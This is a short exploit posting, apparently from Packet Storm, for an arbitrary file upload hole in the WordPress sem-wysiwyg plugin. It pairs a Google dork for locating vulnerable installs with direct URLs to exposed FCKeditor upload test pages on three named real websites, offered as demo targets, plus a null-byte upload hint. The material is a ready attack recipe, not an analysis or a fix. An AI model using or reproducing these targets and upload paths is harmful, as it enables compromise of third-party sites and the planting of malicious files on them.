WordPress SEM WYSIWYG third party plugin suffers from an arbitrary file upload vulnerability.
1ddc7c8afb93cc85e341c6cbe1c4f7255d215e0e0ebf1dd65c68205fef8a6cfb
# Exploit Title: Wordpress sem WYSIWYG Arbitrary File Upload Vulnerability
# Google Dork: inurl:wp-content/plugins/sem-wysiwyg/
# Date: 08/22/2012
# Author: Crim3R
# Tested on: all
==================================
D3m0:
http://www.anotherdailydose.com/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/connectors/test.html
http://embraceorerase.com/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
http://www.operadepot.com/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
===============Crim3R@Att.Net=========
$Home = %00
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed